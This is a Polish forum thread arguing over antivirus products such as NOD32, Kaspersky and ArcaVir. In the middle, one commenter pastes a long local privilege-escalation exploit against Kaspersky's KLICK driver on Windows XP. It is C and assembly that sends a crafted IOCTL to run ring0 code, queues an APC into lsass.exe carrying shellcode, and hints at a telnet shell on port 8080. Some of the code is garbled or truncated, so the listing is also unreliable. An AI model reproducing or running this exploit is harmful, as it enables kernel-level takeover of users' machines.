3 x anonim, nie wiem dlaczego wywnioskowałeś, że używam GDATA? Ja obecnie używam porządnego antywirusa i to w dodatku polskiego jakim jest ArcaVir warszawskiej firmy Arcabit. :-)) Wybrałem go po publikacji najnowszego PC World gdzie czytelnicy ocenili polski Arcavir bardzo, bardzo wysoko. :-))

wersja ta, przynajmniej u mnie nie dziala poprawnie, na viscie64

po restarcie komputera wylacza ochrone, ciekawe

wracam do wersji 3...., na viscie_68 rowniez sie zacina

co wy wiecie o antivirach,przecierz jak sie czyta wasze szczeniackie wypowiedzi,w ktorych sie przescigacie ktory soft tego typu jest lepszzy,to odrazu golym okiem widac ze niegdy nie uzywaliscie innego antivira procz obecnie uzywanego przez was programu,wiec skad mozecie wiedziec ktory jest lepszy czy nod czy avast czy kaspersky, ja wprzeciwienstwie do was uzywalem wlasnie tych wyzej wymienionych i che zaznaczyc ze jest to tylko moja subiektywna ocena ale stawiam na nod
Pozdrawiam

dlatego kupiłem sobie ESET Smart Security 4.0 naprawdę fajny program i nie jest bardzo wymagający :D

elite404.info | Jack | IPHASH : M9-MW-ID-2V | 03.03.2009, 09:04
Mozilla/5.0 (X11; U; Linux i686 (x86_64); pl; rv;1.9.0.1 Gecko/2008070206 Firefox/3/gentoo
Wiec uzytkownicy kasperskiego, zyjcie w nieswiadomosci... Zyjcie dalej, jako antywir OK, jako aplikacja w rekach atakujacego? Porazka, masa dziur w programie dajaca sie wyeksploitowac nawet przez Remote access. Polecam lekture: http://www.zdnet.co.uk/tsearch/security+kaspersky+exploit.htm

dodam, ze blad jest stale ten sam od wersji 6.0 kis ,kav pozwole sobie przedstawic kawalek kodu.
/wywołanie ring0/
mov eax,fs:[0x124]//
mov esi,[eax+0x44]//proces w pamieci
mov eax,esi
search:
mov eax,[eax+0x88] //activeprocess
sub eax,0x88
// cmp dword ptr[eax+0x84],0x444//EPROCESS_PID
cmp dword ptr[eax+0x174],'sasl'//FileName lsass.exe
jne search
// mov ebx,dword ptr[eax+0xc8]//system token
mov ebx,eax
lea esi,code//code
mov ecx,0x1d6// code = 0x1d6
mov dword ptr[edi],0xffdf0800//Kernel ffdf0000=user 7ffe0000
push edi
mov edi,[edi]
rep movsb
pop edi
mov ecx,dword ptr[ebx+0x190]
finddelay:
mov ecx,[ecx]
cmp byte ptr[ecx-0x1ff],0x5//1ff =ethread list - state 0x5=wait
jnz finddelay
sub ecx,0x22c
mov ebp,ecx
push 0x30//APC Object sizeof
push 0 //Nonpage
mov eax,ExAllocatePool//ExAllocatePool for APC Object
call eax//call ExAllocatePool
mov esi,eax
xor edx,edx
push edx//NULL
push 01//UserMode
// push dword ptr[edi]//user mode shellcode
mov eax,0x7ffe0800//user mode shellcode
push eax//User Mode routine
push edx//NULL
mov eax,ZwYieldExecution//0x804dd668//804dd237=kernel routine ret
push eax//Kernel Mode routine
push edx//NULL
push ebp//ETHREAD
push esi//APC object
mov eax,KeInitializeApc //initialize APC
call eax
xor ecx,ecx
xor edx,edx
xor eax,eax
push eax
push eax
push ebp//ETHREAD
push esi//APC Object
mov eax,KeInsertQueueApc
call eax
// test eax,eax
// jz recall
mov byte ptr[ebp+0x4a],0x1

/*
push 0x80000000
push 0
push 0
mov eax,0x804dd4b8
call eax
*/
/*
yeldloop:
mov eax,0x804df4d5
call eax
jmp yeldloop
*/
iretd
/*end here*/
int 3
NOP
NOP
}

exit(1);
}
BOOL getNativeAPIs(void)
{
HMODULE hntdll;
hntdll = GetModuleHandle("ntdll.dll");
*(FARPROC *)&_NtQuerySystemInformation =
GetProcAddress(hntdll, "ZwQuerySystemInformation");
if(_NtQuerySystemInformation)
{
return TRUE;
}
return FALSE;
}
DWORD getKernelBase(void)
{
HANDLE hHeap = GetProcessHeap();
NTSTATUS Status;
ULONG cbBuffer = 0x8000;
PVOID pBuffer = NULL;
DWORD retVal = DEF_KERNEL_BASE;
do
{
pBuffer = HeapAlloc(hHeap, 0, cbBuffer);
if (pBuffer == NULL)
return DEF_KERNEL_BASE;
Status = _NtQuerySystemInformation(SystemModuleInformation,
pBuffer, cbBuffer, NULL);
if(Status == STATUS_INFO_LENGTH_MISMATCH)
{
HeapFree(hHeap, 0, pBuffer);
cbBuffer *= 2;
}
else if(Status != STATUS_SUCCESS)
{
HeapFree(hHeap, 0, pBuffer);
return DEF_KERNEL_BASE;
}
} while (Status == STATUS_INFO_LENGTH_MISMATCH);

DWORD numEntries = *((DWORD *)pBuffer);
SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)((char *)pBuffer + sizeof(DWORD));
for(DWORD i = 0; i < numEntries; i++)
{ if(strcmpi(smi->ImageName, "ntoskrnl.exe"))
{
printf("%.8X - %sn", smi->Base, smi->ImageName);
retVal = (DWORD)(smi->Base);
break;
}
smi++;
}

HeapFree(hHeap, 0, pBuffer); /zapelnienie pbuffer hhepem przez lce

return retVal;
}
VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_ _SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}
int main(int argc, char *argv[])
{

DWORD InBuff[1];
DWORD dwIOCTL,OutSize,InSize,junk;
HANDLE hDevice;
OSVERSIONINFO ov;
system("cls");
ov.dwOSVersionInfoSize = sizeof(ov);
GetVersionEx(&ov);
if(ov.dwMajorVersion != 5)
{
return 1;
}

if(ov.dwMinorVersion != 1)
{
return 1;
}
getNativeAPIs();

kbase=(unsigned long *)getKernelBase();
base=LoadLibrary("ntoskrnl.exe");

ExAllocatePool=(int *)GetProcAddress(base,"ExAllocatePool");
KeInitializeApc=(int *)GetProcAddress(base,"KeInitializeApc");
KeInsertQueueApc=(int *)GetProcAddress(base,"KeInsertQueueApc");
ZwYieldExecution=(int *)GetProcAddress(base,"ZwYieldExecution");
ExAllocatePool=(int *)((int *)ExAllocatePool - (int *)base+(int *)kbase);
KeInitializeApc=(int *)((int *)KeInitializeApc-(int *)base+(int *)kbase);
KeInsertQueueApc=(int *)((int *)KeInsertQueueApc-(int *)base+(int *)kbase);
ZwYieldExecution=(int *)((int *)ZwYieldExecution-(int *)base+(int *)kbase);
FreeLibrary(base);

hDevice = CreateFile("\\.\KLICK",
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[!] KLICK Device Handle [%x]n",hDevice);
InSize = 0x8;
InBuff[0] =(DWORD) Ring0Function; // Ring0 ShellCode Address
dwIOCTL = 0x80052110;
printf("[!] IOCTL [0x%x]nn",dwIOCTL);
printf("polaczenienn");
printf("Telnet x.x.x.x 8080 działa ;]:Pnn");
DeviceIoControl(hDevice,
dwIOCTL,
InBuff,0x8,
(LPVOID)NULL,0,
&junk,
NULL);
}


Tak wiec analizujac ten kod pod winxp sp2/3 oraz shellcode zrozumiecie ze Kasperskiego programowali Debile, to jest jedynie jeden z tysiaca bledow

wszystkie programy antyworusowe to fikcja nie wiecie jeszce tego? tylko nakręcacie komuś kasę kupując takie programy.
i jesteście załośni jak w to wierzycie że jakiś tam program moze zapobiegać jakiemus wirusowi. po za tym to wszystko fikcja jak cały świat komputerowy internet i kasa. zastanówcie się w co wierzycie....

czy jak się instaluje lub opłaca NODa to on usuwa historię ?

Czekam na post: "A ja zarządzam światowym internetem/galaktyczną siecią neuronową.." et cetera. Prężycie swoje muskułki jak panowie z Wiejskiej :-) Życzę zdrówka, bo chyba macie za dużo stresów, a to, jak ryba, wpływa na wszystko.
P.S. Przypomina mi się skecz Monty Pythona, w którym grupa mężczyzn licytuje się, który miał cięższe dzieciństwo...:-) Notabene - polecam również inne skecze, bo śmiech to zdrowie.

moze i nie to nie bedzie konstruktywne, ale wiekszosc wypowiedzi pisza tu pustaki, ktorzy pisza zeby zaistniec, po prostu zal... Uzywajcie sobie co chcecie, tylko jeszcze piszsie dlaczego bo to glownie interesuje czytajacych posty. Uzywam noda 32 w wersji 3.0672 od pol roku, dopoki nie dopieprzylem systemu kilkunastoma instalkami system mi chodzil jak zloto pol roku (duze zdziwko z mojej strony) wczesniej mialem nortonka 2008, gora 2 miechy i C:format :-) swoja droga to niezle sie usmialem czytajac niektore wypowiedzi, pozdrowionka dla specow :-)))))

Przeczytałem wszystkie uczone opinie i dalej nie wiem, czy NOD jest dobry czy średni. Z przyjemnością sięgam do Komputer Świat gdyż tu można zobaczyć wg mnie rzetelny ranking antywirusów. Niestety w rankingu tym b. rzadko widzę NOD`a. To jest dla mnie pewnym miernikiem wartości antywirusa, a jeżeli jeszcze do tego jakiś antywirus jest w pierwszej piątce, to już jest nobilitacja.
Pozdrawiam dyskutantów.

mam NODA od miesiąca i nie narzekam :) do tego outpost firewall pro i jest gites malina :)))))) żadne badziewie sie nie prześlizgnie ;P

Testowałem wiele programów tego typu i z pewnością ten jest najlepszy. Lekki, wysoka wykrywalność i nie jest drogi, średnio 10 zł za miesiąc.